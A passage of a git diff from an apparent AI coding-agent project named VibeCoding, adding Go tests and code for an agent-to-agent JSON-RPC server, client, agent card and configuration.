+	cfg := &Config{WorkDir: "/tmp/test"}
+	if wd := cfg.GetWorkDir(); wd != "/tmp/test" {
+		t.Errorf("expected /tmp/test, got %s", wd)
+	}
+
+	cfg2 := &Config{WorkDir: ""}
+	wd := cfg2.GetWorkDir()
+	if wd == "" {
+		t.Error("expected non-empty work dir")
+	}
+}
+
+func TestTaskStore(t *testing.T) {
+	store := NewTaskStore()
+
+	// Create
+	task := store.Create("task_1")
+	if task.ID != "task_1" {
+		t.Errorf("expected task_1, got %s", task.ID)
+	}
+	if task.State != TaskStateSubmitted {
+		t.Errorf("expected submitted, got %s", task.State)
+	}
+
+	// Get
+	got := store.Get("task_1")
+	if got == nil {
+		t.Fatal("expected task, got nil")
+	}
+	if got.ID != "task_1" {
+		t.Errorf("expected task_1, got %s", got.ID)
+	}
+
+	// Get non-existent
+	if store.Get("nonexistent") != nil {
+		t.Error("expected nil for non-existent task")
+	}
+
+	// Update state
+	store.SetState("task_1", TaskStateWorking)
+	task = store.Get("task_1")
+	if task.State != TaskStateWorking {
+		t.Errorf("expected working, got %s", task.State)
+	}
+
+	// Update
+	task.State = TaskStateCompleted
+	store.Update(task)
+	task = store.Get("task_1")
+	if task.State != TaskStateCompleted {
+		t.Errorf("expected completed, got %s", task.State)
+	}
+}
+
+func TestTaskStoreGetReturnsCopy(t *testing.T) {
+	store := NewTaskStore()
+	task := store.Create("task_1")
+	task.State = TaskStateCompleted
+	task.Message = &Message{Role: "user", Parts: []MessagePart{{Type: "text", Text: "original"}}}
+	task.Metadata = map[string]any{"k": "v"}
+	store.Update(task)
+
+	got := store.Get("task_1")
+	got.State = TaskStateFailed
+	got.Message.Parts[0].Text = "mutated"
+	got.Metadata["k"] = "mutated"
+
+	again := store.Get("task_1")
+	if again.State != TaskStateCompleted {
+		t.Fatalf("state = %s, want completed", again.State)
+	}
+	if again.Message.Parts[0].Text != "original" {
+		t.Fatalf("message text = %q, want original", again.Message.Parts[0].Text)
+	}
+	if again.Metadata["k"] != "v" {
+		t.Fatalf("metadata k = %v, want v", again.Metadata["k"])
+	}
+}
+
+func TestNewTaskIDConcurrentUnique(t *testing.T) {
+	const count = 500
+	var wg sync.WaitGroup
+	ids := make(chan string, count)
+
+	for i := 0; i < count; i++ {
+		wg.Add(1)
+		go func() {
+			defer wg.Done()
+			ids <- newTaskID()
+		}()
+	}
+	wg.Wait()
+	close(ids)
+
+	seen := make(map[string]bool, count)
+	for id := range ids {
+		if seen[id] {
+			t.Fatalf("duplicate id: %s", id)
+		}
+		seen[id] = true
+	}
+}
+
+func TestTaskStateTransitions(t *testing.T) {
+	states := []TaskState{
+		TaskStateSubmitted,
+		TaskStateWorking,
+		TaskStateCompleted,
+		TaskStateFailed,
+		TaskStateCanceled,
+	}
+
+	for _, state := range states {
+		if string(state) == "" {
+			t.Errorf("empty state in list")
+		}
+	}
+}
+
+func TestDefaultAgentCard(t *testing.T) {
+	card := DefaultAgentCard("0.1.27", "http://localhost:8093")
+
+	if card.Name != "VibeCoding" {
+		t.Errorf("expected VibeCoding, got %s", card.Name)
+	}
+	if card.Version != "0.1.27" {
+		t.Errorf("expected 0.1.27, got %s", card.Version)
+	}
+	if card.URL != "http://localhost:8093/a2a" {
+		t.Errorf("expected http://localhost:8093/a2a, got %s", card.URL)
+	}
+	if !card.Capabilities.Streaming {
+		t.Error("expected streaming=true")
+	}
+	if len(card.Skills) != 3 {
+		t.Errorf("expected 3 skills, got %d", len(card.Skills))
+	}
+}
+
+func TestHandleAgentCard(t *testing.T) {
+	card := DefaultAgentCard("0.1.27", "http://localhost:8093")
+	handler := HandleAgentCard(card)
+
+	// GET request
+	req := httptest.NewRequest("GET", "/.well-known/agent.json", nil)
+	w := httptest.NewRecorder()
+	handler(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Errorf("expected 200, got %d", w.Code)
+	}
+
+	var got AgentCard
+	if err := json.NewDecoder(w.Body).Decode(&got); err != nil {
+		t.Fatalf("decode error: %v", err)
+	}
+	if got.Name != "VibeCoding" {
+		t.Errorf("expected VibeCoding, got %s", got.Name)
+	}
+
+	// POST should be rejected
+	req2 := httptest.NewRequest("POST", "/.well-known/agent.json", nil)
+	w2 := httptest.NewRecorder()
+	handler(w2, req2)
+	if w2.Code != http.StatusMethodNotAllowed {
+		t.Errorf("expected 405, got %d", w2.Code)
+	}
+}
+
+func TestServerAuthProtectsA2AEndpoints(t *testing.T) {
+	srv := NewServer(&Config{Host: "127.0.0.1", Port: 8093, AuthToken: "secret"}, "0.1.27", &mockExecutor{response: "ok"})
+
+	params := SendMessageParams{
+		Message: &Message{
+			Role:  "user",
+			Parts: []MessagePart{{Type: "text", Text: "hello"}},
+		},
+	}
+	paramsJSON, _ := json.Marshal(params)
+	reqBody := JSONRPCRequest{JSONRPC: "2.0", Method: "message/send", Params: paramsJSON, ID: 1}
+	body, _ := json.Marshal(reqBody)
+
+	for _, tc := range []struct {
+		name   string
+		auth   string
+		status int
+	}{
+		{name: "missing", status: http.StatusUnauthorized},
+		{name: "invalid", auth: "Bearer wrong", status: http.StatusUnauthorized},
+		{name: "valid", auth: "Bearer secret", status: http.StatusOK},
+	} {
+		t.Run(tc.name, func(t *testing.T) {
+			req := httptest.NewRequest("POST", "/a2a", strings.NewReader(string(body)))
+			req.Header.Set("Content-Type", "application/json")
+			if tc.auth != "" {
+				req.Header.Set("Authorization", tc.auth)
+			}
+			w := httptest.NewRecorder()
+
+			srv.mux.ServeHTTP(w, req)
+
+			if w.Code != tc.status {
+				t.Fatalf("status = %d, want %d; body=%s", w.Code, tc.status, w.Body.String())
+			}
+		})
+	}
+}
+
+func TestServerAuthLeavesAgentCardPublic(t *testing.T) {
+	srv := NewServer(&Config{Host: "127.0.0.1", Port: 8093, AuthToken: "secret"}, "0.1.27", &mockExecutor{})
+
+	req := httptest.NewRequest("GET", "/.well-known/agent.json", nil)
+	w := httptest.NewRecorder()
+	srv.mux.ServeHTTP(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Fatalf("status = %d, want %d", w.Code, http.StatusOK)
+	}
+}
+
+func TestHandlerMessageSend(t *testing.T) {
+	executor := &mockExecutor{
+		response: "Hello from agent",
+	}
+	handler := NewHandler(executor)
+
+	// Create a message/send request
+	params := SendMessageParams{
+		Message: &Message{
+			Role:  "user",
+			Parts: []MessagePart{{Type: "text", Text: "hello"}},
+		},
+	}
+	paramsJSON, _ := json.Marshal(params)
+
+	reqBody := JSONRPCRequest{
+		JSONRPC: "2.0",
+		Method:  "message/send",
+		Params:  paramsJSON,
+		ID:      1,
+	}
+	body, _ := json.Marshal(reqBody)
+
+	req := httptest.NewRequest("POST", "/a2a", strings.NewReader(string(body)))
+	req.Header.Set("Content-Type", "application/json")
+	w := httptest.NewRecorder()
+
+	handler.ServeHTTP(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Errorf("expected 200, got %d", w.Code)
+	}
+
+	var resp JSONRPCResponse
+	if err := json.NewDecoder(w.Body).Decode(&resp); err != nil {
+		t.Fatalf("decode error: %v", err)
+	}
+	if resp.Error != nil {
+		t.Errorf("unexpected error: %s", resp.Error.Message)
+	}
+	if resp.JSONRPC != "2.0" {
+		t.Errorf("expected jsonrpc 2.0, got %s", resp.JSONRPC)
+	}
+}
+
+func TestHandlerMessageSendPersistsWorkingMessage(t *testing.T) {
+	executor := &blockingExecutor{
+		started: make(chan struct{}),
+		release: make(chan struct{}),
+	}
+	handler := NewHandler(executor)
+	handler.GetTaskStore().Create("persist_task")
+
+	params := SendMessageParams{
+		TaskID: "persist_task",
+		Message: &Message{
+			Role:  "user",
+			Parts: []MessagePart{{Type: "text", Text: "hello"}},
+		},
+	}
+	paramsJSON, _ := json.Marshal(params)
+	reqBody := JSONRPCRequest{
+		JSONRPC: "2.0",
+		Method:  "message/send",
+		Params:  paramsJSON,
+		ID:      1,
+	}
+	body, _ := json.Marshal(reqBody)
+
+	req := httptest.NewRequest("POST", "/a2a", strings.NewReader(string(body)))
+	req.Header.Set("Content-Type", "application/json")
+	w := httptest.NewRecorder()
+	done := make(chan struct{})
+	go func() {
+		defer close(done)
+		handler.ServeHTTP(w, req)
+	}()
+
+	select {
+	case <-executor.started:
+	case <-time.After(time.Second):
+		t.Fatal("timeout waiting for executor")
+	}
+
+	task := handler.GetTaskStore().Get("persist_task")
+	if task.State != TaskStateWorking {
+		t.Fatalf("state = %s, want working", task.State)
+	}
+	if task.Message == nil || task.Message.Parts[0].Text != "hello" {
+		t.Fatalf("message = %#v, want hello text", task.Message)
+	}
+
+	close(executor.release)
+	select {
+	case <-done:
+	case <-time.After(time.Second):
+		t.Fatal("timeout waiting for handler")
+	}
+}
+
+func TestHandlerGetTask(t *testing.T) {
+	executor := &mockExecutor{response: "done"}
+	handler := NewHandler(executor)
+
+	// Create a task first
+	task := handler.GetTaskStore().Create("test_task")
+	task.State = TaskStateCompleted
+	handler.GetTaskStore().Update(task)
+
+	// Get task via JSON-RPC
+	params, _ := json.Marshal(map[string]string{"task_id": "test_task"})
+	reqBody := JSONRPCRequest{
+		JSONRPC: "2.0",
+		Method:  "task/get",
+		Params:  params,
+		ID:      2,
+	}
+	body, _ := json.Marshal(reqBody)
+
+	req := httptest.NewRequest("POST", "/a2a", strings.NewReader(string(body)))
+	req.Header.Set("Content-Type", "application/json")
+	w := httptest.NewRecorder()
+
+	handler.ServeHTTP(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Errorf("expected 200, got %d", w.Code)
+	}
+
+	var resp JSONRPCResponse
+	json.NewDecoder(w.Body).Decode(&resp)
+	if resp.Error != nil {
+		t.Errorf("unexpected error: %s", resp.Error.Message)
+	}
+}
+
+func TestHandlerCancelTask(t *testing.T) {
+	executor := &mockExecutor{response: "done"}
+	handler := NewHandler(executor)
+
+	// Create a working task
+	task := handler.GetTaskStore().Create("cancel_task")
+	task.State = TaskStateWorking
+	handler.GetTaskStore().Update(task)
+
+	// Cancel via JSON-RPC
+	params, _ := json.Marshal(map[string]string{"task_id": "cancel_task"})
+	reqBody := JSONRPCRequest{
+		JSONRPC: "2.0",
+		Method:  "task/cancel",
+		Params:  params,
+		ID:      3,
+	}
+	body, _ := json.Marshal(reqBody)
+
+	req := httptest.NewRequest("POST", "/a2a", strings.NewReader(string(body)))
+	req.Header.Set("Content-Type", "application/json")
+	w := httptest.NewRecorder()
+
+	handler.ServeHTTP(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Errorf("expected 200, got %d", w.Code)
+	}
+
+	// Verify task is canceled
+	task = handler.GetTaskStore().Get("cancel_task")
+	if task.State != TaskStateCanceled {
+		t.Errorf("expected canceled, got %s", task.State)
+	}
+}
+
+func TestHandlerInvalidJSON(t *testing.T) {
+	executor := &mockExecutor{}
+	handler := NewHandler(executor)
+
+	req := httptest.NewRequest("POST", "/a2a", strings.NewReader("not json"))
+	req.Header.Set("Content-Type", "application/json")
+	w := httptest.NewRecorder()
+
+	handler.ServeHTTP(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Errorf("expected 200, got %d", w.Code)
+	}
+
+	var resp JSONRPCResponse
+	json.NewDecoder(w.Body).Decode(&resp)
+	if resp.Error == nil {
+		t.Error("expected error for invalid JSON")
+	}
+	if resp.Error.Code != -32700 {
+		t.Errorf("expected error code -32700, got %d", resp.Error.Code)
+	}
+}
+
+func TestHandlerInvalidMethod(t *testing.T) {
+	executor := &mockExecutor{}
+	handler := NewHandler(executor)
+
+	reqBody := JSONRPCRequest{
+		JSONRPC: "2.0",
+		Method:  "unknown/method",
+		ID:      1,
+	}
+	body, _ := json.Marshal(reqBody)
+
+	req := httptest.NewRequest("POST", "/a2a", strings.NewReader(string(body)))
+	req.Header.Set("Content-Type", "application/json")
+	w := httptest.NewRecorder()
+
+	handler.ServeHTTP(w, req)
+
+	var resp JSONRPCResponse
+	json.NewDecoder(w.Body).Decode(&resp)
+	if resp.Error == nil {
+		t.Error("expected error for unknown method")
+	}
+	if resp.Error.Code != -32601 {
+		t.Errorf("expected error code -32601, got %d", resp.Error.Code)
+	}
+}
+
+func TestHandlerInvalidJSONRPCVersion(t *testing.T) {
+	executor := &mockExecutor{}
+	handler := NewHandler(executor)
+
+	reqBody := JSONRPCRequest{
+		JSONRPC: "1.0",
+		Method:  "message/send",
+		ID:      1,
+	}
+	body, _ := json.Marshal(reqBody)
+
+	req := httptest.NewRequest("POST", "/a2a", strings.NewReader(string(body)))
+	req.Header.Set("Content-Type", "application/json")
+	w := httptest.NewRecorder()
+
+	handler.ServeHTTP(w, req)
+
+	var resp JSONRPCResponse
+	json.NewDecoder(w.Body).Decode(&resp)
+	if resp.Error == nil {
+		t.Error("expected error for invalid jsonrpc version")
+	}
+	if resp.Error.Code != -32600 {
+		t.Errorf("expected error code -32600, got %d", resp.Error.Code)
+	}
+}
+
+func TestHandlerMethodNotAllowed(t *testing.T) {
+	executor := &mockExecutor{}
+	handler := NewHandler(executor)
+
+	req := httptest.NewRequest("GET", "/a2a", nil)
+	w := httptest.NewRecorder()
+
+	handler.ServeHTTP(w, req)
+
+	if w.Code != http.StatusMethodNotAllowed {
+		t.Errorf("expected 405, got %d", w.Code)
+	}
+}
+
+func TestSubscribeUnsubscribe(t *testing.T) {
+	executor := &mockExecutor{}
+	handler := NewHandler(executor)
+
+	ch := handler.Subscribe("task_1")
+	if ch == nil {
+		t.Fatal("expected channel")
+	}
+
+	// Send event
+	handler.broadcast("task_1", TaskEvent{
+		TaskID: "task_1",
+		State:  TaskStateWorking,
+	})
+
+	select {
+	case ev := <-ch:
+		if ev.TaskID != "task_1" {
+			t.Errorf("expected task_1, got %s", ev.TaskID)
+		}
+	case <-time.After(time.Second):
+		t.Error("timeout waiting for event")
+	}
+
+	// Unsubscribe
+	handler.Unsubscribe("task_1", ch)
+}
+
+func TestClientSendMessage(t *testing.T) {
+	// Create mock server
+	server := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		if r.URL.Path != "/a2a" {
+			http.Error(w, "not found", http.StatusNotFound)
+			return
+		}
+
+		var req JSONRPCRequest
+		json.NewDecoder(r.Body).Decode(&req)
+
+		task := &Task{
+			ID:    "task_123",
+			State: TaskStateCompleted,
+			Artifacts: []Artifact{
+				{Name: "response", Parts: []MessagePart{{Type: "text", Text: "Hello!"}}},
+			},
+		}
+
+		json.NewEncoder(w).Encode(JSONRPCResponse{
+			JSONRPC: "2.0",
+			Result:  task,
+			ID:      req.ID,
+		})
+	}))
+	defer server.Close()
+
+	client := NewClient(server.URL, "")
+	task, err := client.SendMessage(context.Background(), "", &Message{
+		Role:  "user",
+		Parts: []MessagePart{{Type: "text", Text: "hello"}},
+	})
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if task.ID != "task_123" {
+		t.Errorf("expected task_123, got %s", task.ID)
+	}
+	if task.State != TaskStateCompleted {
+		t.Errorf("expected completed, got %s", task.State)
+	}
+}
+
+func TestClientGetAgentCard(t *testing.T) {
+	card := DefaultAgentCard("0.1.27", "http://localhost:8093")
+	server := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		if r.URL.Path != "/.well-known/agent.json" {
+			http.Error(w, "not found", http.StatusNotFound)
+			return
+		}
+		json.NewEncoder(w).Encode(card)
+	}))
+	defer server.Close()
+
+	client := NewClient(server.URL, "")
+	got, err := client.GetAgentCard(context.Background())
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if got.Name != "VibeCoding" {
+		t.Errorf("expected VibeCoding, got %s", got.Name)
+	}
+}
+
+func TestClientError(t *testing.T) {
+	server := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		json.NewEncoder(w).Encode(JSONRPCResponse{
+			JSONRPC: "2.0",
+			Error:   &JSONRPCError{Code: -32000, Message: "task not found"},
+			ID:      1,
+		})
+	}))
+	defer server.Close()
+
+	client := NewClient(server.URL, "")
+	_, err := client.SendMessage(context.Background(), "", &Message{
+		Role:  "user",
+		Parts: []MessagePart{{Type: "text", Text: "hello"}},
+	})
+	if err == nil {
+		t.Error("expected error")
+	}
+	if !strings.Contains(err.Error(), "task not found") {
+		t.Errorf("expected 'task not found' in error, got: %v", err)
+	}
+}
+
+func TestClientWithAuth(t *testing.T) {
+	var gotToken string
+	server := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		gotToken = r.Header.Get("Authorization")
+		task := &Task{ID: "t1", State: TaskStateCompleted}
+		json.NewEncoder(w).Encode(JSONRPCResponse{JSONRPC: "2.0", Result: task, ID: 1})
+	}))
+	defer server.Close()
+
+	client := NewClient(server.URL, "test-token")
+	_, err := client.SendMessage(context.Background(), "", &Message{
+		Role:  "user",
+		Parts: []MessagePart{{Type: "text", Text: "hello"}},
+	})
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if gotToken != "Bearer test-token" {
+		t.Errorf("expected 'Bearer test-token', got '%s'", gotToken)
+	}
+}
+
+// mockExecutor implements AgentExecutor for testing.
+type mockExecutor struct {
+	response string
+	err      error
+}
+
+func (m *mockExecutor) ExecuteTask(ctx context.Context, task *Task, msg *Message) (<-chan TaskEvent, error) {
+	if m.err != nil {
+		return nil, m.err
+	}
+
+	ch := make(chan TaskEvent, 10)
+	go func() {
+		defer close(ch)
+		ch <- TaskEvent{
+			TaskID:    task.ID,
+			State:     TaskStateWorking,
+			Message:   &Message{Role: "agent", Parts: []MessagePart{{Type: "text", Text: m.response}}},
+			Timestamp: time.Now(),
+		}
+		ch <- TaskEvent{
+			TaskID: task.ID,
+			State:  TaskStateCompleted,
+			Artifact: &Artifact{
+				Name:  "response",
+				Parts: []MessagePart{{Type: "text", Text: m.response}},
+			},
+			Timestamp: time.Now(),
+		}
+	}()
+
+	return ch, nil
+}
+
+type blockingExecutor struct {
+	started chan struct{}
+	release chan struct{}
+}
+
+func (b *blockingExecutor) ExecuteTask(ctx context.Context, task *Task, msg *Message) (<-chan TaskEvent, error) {
+	ch := make(chan TaskEvent, 1)
+	go func() {
+		defer close(ch)
+		close(b.started)
+		select {
+		case <-b.release:
+		case <-ctx.Done():
+			return
+		}
+		ch <- TaskEvent{
+			TaskID:    task.ID,
+			State:     TaskStateCompleted,
+			Timestamp: time.Now(),
+		}
+	}()
+	return ch, nil
+}
diff --git a/internal/a2a/agent_card.go b/internal/a2a/agent_card.go
new file mode 100644
index 0000000..313a905
--- /dev/null
+++ b/internal/a2a/agent_card.go
@@ -0,0 +1,72 @@
+package a2a
+
+import (
+	"encoding/json"
+	"net/http"
+)
+
+// AgentCard represents the A2A Agent Card (/.well-known/agent.json).
+type AgentCard struct {
+	Name         string       `json:"name"`
+	Description  string       `json:"description"`
+	URL          string       `json:"url"`
+	Version      string       `json:"version"`
+	Capabilities Capabilities `json:"capabilities"`
+	Skills       []Skill      `json:"skills"`
+}
+
+// Capabilities describes what the agent can do.
+type Capabilities struct {
+	Streaming         bool `json:"streaming"`
+	PushNotifications bool `json:"pushNotifications"`
+}
+
+// Skill describes a specific capability.
+type Skill struct {
+	ID          string `json:"id"`
+	Name        string `json:"name"`
+	Description string `json:"description"`
+}
+
+// DefaultAgentCard returns the default Agent Card for VibeCoding.
+func DefaultAgentCard(version, serverURL string) *AgentCard {
+	return &AgentCard{
+		Name:        "VibeCoding",
+		Description: "AI coding assistant with file editing, terminal, and search capabilities",
+		URL:         serverURL + "/a2a",
+		Version:     version,
+		Capabilities: Capabilities{
+			Streaming:         true,
+			PushNotifications: false,
+		},
+		Skills: []Skill{
+			{
+				ID:          "code-edit",
+				Name:        "Code Editing",
+				Description: "Read, write, and edit code files with precise text replacement",
+			},
+			{
+				ID:          "terminal",
+				Name:        "Terminal Execution",
+				Description: "Execute shell commands, run tests, build projects",
+			},
+			{
+				ID:          "code-search",
+				Name:        "Code Search",
+				Description: "Search codebases with ripgrep and fd",
+			},
+		},
+	}
+}
+
+// HandleAgentCard serves the Agent Card at /.well-known/agent.json.
+func HandleAgentCard(card *AgentCard) http.HandlerFunc {
+	return func(w http.ResponseWriter, r *http.Request) {
+		if r.Method != http.MethodGet {
+			http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
+			return
+		}
+		w.Header().Set("Content-Type", "application/json")
+		json.NewEncoder(w).Encode(card)
+	}
+}
diff --git a/internal/a2a/client.go b/internal/a2a/client.go
new file mode 100644
index 0000000..bdd8345
--- /dev/null
+++ b/internal/a2a/client.go
@@ -0,0 +1,228 @@
+package a2a
+
+import (
+	"bytes"
+	"context"
+	"encoding/json"
+	"fmt"
+	"io"
+	"net/http"
+	"time"
+)
+
+// Client is an A2A protocol client for sending tasks to other A2A servers.
+type Client struct {
+	httpClient *http.Client
+	baseURL    string
+	authToken  string
+}
+
+// NewClient creates a new A2A client.
+func NewClient(baseURL, authToken string) *Client {
+	return &Client{
+		httpClient: &http.Client{Timeout: 300 * time.Second},
+		baseURL:    baseURL,
+		authToken:  authToken,
+	}
+}
+
+// SendMessage sends a message to an A2A server (sync response).
+func (c *Client) SendMessage(ctx context.Context, taskID string, msg *Message) (*Task, error) {
+	req := JSONRPCRequest{
+		JSONRPC: "2.0",
+		Method:  "message/send",
+		Params: mustMarshal(SendMessageParams{
+			TaskID:  taskID,
+			Message: msg,
+		}),
+		ID: 1,
+	}
+
+	var result Task
+	if err := c.doRPC(ctx, &req, &result); err != nil {
+		return nil, err
+	}
+	return &result, nil
+}
+
+// SendMessageStream sends a message and returns SSE events via channel.
+func (c *Client) SendMessageStream(ctx context.Context, taskID string, msg *Message) (<-chan TaskEvent, error) {
+	req := JSONRPCRequest{
+		JSONRPC: "2.0",
+		Method:  "message/send",
+		Params: mustMarshal(SendMessageParams{
+			TaskID:  taskID,
+			Message: msg,
+		}),
+		ID: 1,
+	}
+
+	body, _ := json.Marshal(req)
+	httpReq, err := http.NewRequestWithContext(ctx, "POST", c.baseURL+"/a2a", bytes.NewReader(body))
+	if err != nil {
+		return nil, err
+	}
+	httpReq.Header.Set("Content-Type", "application/json")
+	httpReq.Header.Set("Accept", "text/event-stream")
+	if c.authToken != "" {
+		httpReq.Header.Set("Authorization", "Bearer "+c.authToken)
+	}
+
+	resp, err := c.httpClient.Do(httpReq)
+	if err != nil {
+		return nil, fmt.Errorf("a2a request: %w", err)
+	}
+
+	if resp.StatusCode != http.StatusOK {
+		resp.Body.Close()
+		return nil, fmt.Errorf("a2a request: status %d", resp.StatusCode)
+	}
+
+	ch := make(chan TaskEvent, 100)
+	go func() {
+		defer close(ch)
+		defer resp.Body.Close()
+		c.readSSE(ctx, resp.Body, ch)
+	}()
+
+	return ch, nil
+}
+
+// GetTask gets the current state of a task.
+func (c *Client) GetTask(ctx context.Context, taskID string) (*Task, error) {
+	req := JSONRPCRequest{
+		JSONRPC: "2.0",
+		Method:  "task/get",
+		Params:  mustMarshal(map[string]string{"task_id": taskID}),
+		ID:      2,
+	}
+
+	var result Task
+	if err := c.doRPC(ctx, &req, &result); err != nil {
+		return nil, err
+	}
+	return &result, nil
+}
+
+// CancelTask cancels a running task.
+func (c *Client) CancelTask(ctx context.Context, taskID string) (*Task, error) {
+	req := JSONRPCRequest{
+		JSONRPC: "2.0",
+		Method:  "task/cancel",
+		Params:  mustMarshal(map[string]string{"task_id": taskID}),
+		ID:      3,
+	}
+
+	var result Task
+	if err := c.doRPC(ctx, &req, &result); err != nil {
+		return nil, err
+	}
+	return &result, nil
+}
+
+// GetAgentCard retrieves the Agent Card from the server.
+func (c *Client) GetAgentCard(ctx context.Context) (*AgentCard, error) {
+	httpReq, err := http.NewRequestWithContext(ctx, "GET", c.baseURL+"/.well-known/agent.json", nil)
+	if err != nil {
+		return nil, err
+	}
+
+	resp, err := c.httpClient.Do(httpReq)
+	if err != nil {
+		return nil, fmt.Errorf("get agent card: %w", err)
+	}
+	defer resp.Body.Close()
+
+	if resp.StatusCode != http.StatusOK {
+		return nil, fmt.Errorf("get agent card: status %d", resp.StatusCode)
+	}
+
+	var card AgentCard
+	if err := json.NewDecoder(resp.Body).Decode(&card); err != nil {
+		return nil, fmt.Errorf("decode agent card: %w", err)
+	}
+	return &card, nil
+}
+
+// doRPC performs a JSON-RPC call and decodes the result.
+func (c *Client) doRPC(ctx context.Context, req *JSONRPCRequest, result any) error {
+	body, _ := json.Marshal(req)
+	httpReq, err := http.NewRequestWithContext(ctx, "POST", c.baseURL+"/a2a", bytes.NewReader(body))
+	if err != nil {
+		return err
+	}
+	httpReq.Header.Set("Content-Type", "application/json")
+	if c.authToken != "" {
+		httpReq.Header.Set("Authorization", "Bearer "+c.authToken)
+	}
+
+	resp, err := c.httpClient.Do(httpReq)
+	if err != nil {
+		return fmt.Errorf("a2a rpc: %w", err)
+	}
+	defer resp.Body.Close()
+
+	var rpcResp JSONRPCResponse
+	if err := json.NewDecoder(resp.Body).Decode(&rpcResp); err != nil {
+		return fmt.Errorf("decode response: %w", err)
+	}
+
+	if rpcResp.Error != nil {
+		return fmt.Errorf("a2a error %d: %s", rpcResp.Error.Code, rpcResp.Error.Message)
+	}
+
+	if result != nil && rpcResp.Result != nil {
+		data, _ := json.Marshal(rpcResp.Result)
+		return json.Unmarshal(data, result)
+	}
+	return nil
+}
+
+// readSSE reads SSE events from the response body.
+func (c *Client) readSSE(ctx context.Context, body io.Reader, ch chan<- TaskEvent) {
+	buf := make([]byte, 4096)
+	var remaining []byte
+
+	for {
+		select {
+		case <-ctx.Done():
+			return
+		default:
+		}
+
+		n, err := body.Read(buf)
+		if n > 0 {
+			remaining = append(remaining, buf[:n]...)
+			// Parse SSE lines
+			for {
+				idx := bytes.Index(remaining, []byte("\n\n"))
+				if idx < 0 {
+					break
+				}
+				line := remaining[:idx]
+				remaining = remaining[idx+2:]
+
+				// Parse "data: ..."
+				if bytes.HasPrefix(line, []byte("data: ")) {
+					data := line[6:]
+					var event TaskEvent
+					if err := json.Unmarshal(data, &event); err == nil {
+						select {
+						case ch <- event:
+						case <-ctx.Done():
+							return
+						}
+					}
+				}
+			}
+		}
+		if err != nil {
+			return
+		}
+	}
+}
+
+func mustMarshal(v any) json.RawMessage {
+	data, _ := json.Marshal(v)
+	return data
+}
diff --git a/internal/a2a/config.go b/internal/a2a/config.go
new file mode 100644
index 0000000..4d59bd4
--- /dev/null
+++ b/internal/a2a/config.go
@@ -0,0 +1,105 @@
+// Package a2a implements the A2A (Agent-to-Agent) protocol server.
+// It provides a JSON-RPC 2.0 endpoint for other agents to send tasks to VibeCoding.
+// Supports both standalone mode (vibecoding a2a start) and integration mode (hermes + a2a.enabled).
+package a2a
+
+import (
+	"encoding/json"
+	"fmt"
+	"os"
+	"path/filepath"
+
+	"github.com/startvibecoding/vibecoding/internal/config"
+)
+
+// Config holds A2A server configuration.
+type Config struct {
+	Enabled   bool          `json:"enabled"`
+	Port      int           `json:"port"`
+	Host      string        `json:"host"`
+	AuthToken string        `json:"auth_token,omitempty"`
+	WorkDir   string        `json:"work_dir,omitempty"`
+	AgentCard *AgentCardCfg `json:"agent_card,omitempty"`
+}
+
+// AgentCardCfg holds customizable Agent Card fields.
+type AgentCardCfg struct {
+	Name        string `json:"name,omitempty"`
+	Description string `json:"description,omitempty"`
+	Version     string `json:"version,omitempty"`
+}
+
+// DefaultConfig returns default A2A configuration.
+func DefaultConfig() *Config {
+	return &Config{
+		Enabled: false,
+		Port:    8093,
+		Host:    "127.0.0.1",
+	}
+}
+
+// ConfigPath returns the path to the global a2a.json.
+func ConfigPath() string {
+	return filepath.Join(config.ConfigDir(), "a2a.json")
+}
+
+// ProjectConfigPath returns the path to the project-level .vibe/a2a.json.
+func ProjectConfigPath() string {
+	return filepath.Join(".vibe", "a2a.json")
+}
+
+// GetListenAddr returns the listen address.
+func (c *Config) GetListenAddr() string {
+	return fmt.Sprintf("%s:%d", c.Host, c.Port)
+}
+
+// GetWorkDir returns the resolved working directory.
+func (c *Config) GetWorkDir() string {
+	if c.WorkDir != "" && c.WorkDir != "." {
+		return c.WorkDir
+	}
+	cwd, err := os.Getwd()
+	if err != nil {
+		return "."
+	}
+	return cwd
+}
+
+// SaveConfig writes the config to a JSON file.
+func SaveConfig(path string, cfg *Config) error {
+	if err := os.MkdirAll(filepath.Dir(path), 0700); err != nil {
+		return fmt.Errorf("create config directory: %w", err)
+	}
+	data, err := json.MarshalIndent(cfg, "", "  ")
+	if err != nil {
+		return fmt.Errorf("marshal a2a config: %w", err)
+	}
+	return os.WriteFile(path, data, 0600)
+}
+
+// InitA2AConfig creates the a2a.json template at the default location.
+// Returns the file path. If force is false and the file already exists, returns an error.
+func InitA2AConfig(force bool) (string, error) {
+	path := ConfigPath()
+	if !force {
+		if _, err := os.Stat(path); err == nil {
+			return path, fmt.Errorf("a2a.json already exists: %s", path)
+		}
+	}
+	cfg := DefaultConfig()
+	cfg.AuthToken = "change-me-to-a-random-secret"
+	home, _ := os.UserHomeDir()
+	if home == "" {
+		home = "/home/user"
+	}
+	cfg.WorkDir = filepath.Join(home, "projects")
+	cfg.AgentCard = &AgentCardCfg{
+		Name:        "My A2A Agent",
+		Description: "An AI coding agent accessible via A2A protocol",
+	}
+
+	if err := SaveConfig(path, cfg); err != nil {
+		return "", err
+	}
+	return path, nil
+}
diff --git a/internal/a2a/executor.go b/internal/a2a/executor.go
new file mode 100644
index 0000000..1bf4507
--- /dev/null
+++ b/internal/a2a/executor.go
@@ -0,0 +1,115 @@
+package a2a
+
+import (
+	"context"
+	"fmt"
+	"strings"
+	"time"
+
+	"github.com/startvibecoding/vibecoding/internal/agent"
+)
+
+// DefaultExecutor implements AgentExecutor by running tasks through the agent loop.
+type DefaultExecutor struct {
+	agentFactory AgentFactory
+}
+
+// AgentFactory creates agent instances for A2A task execution.
+type AgentFactory interface {
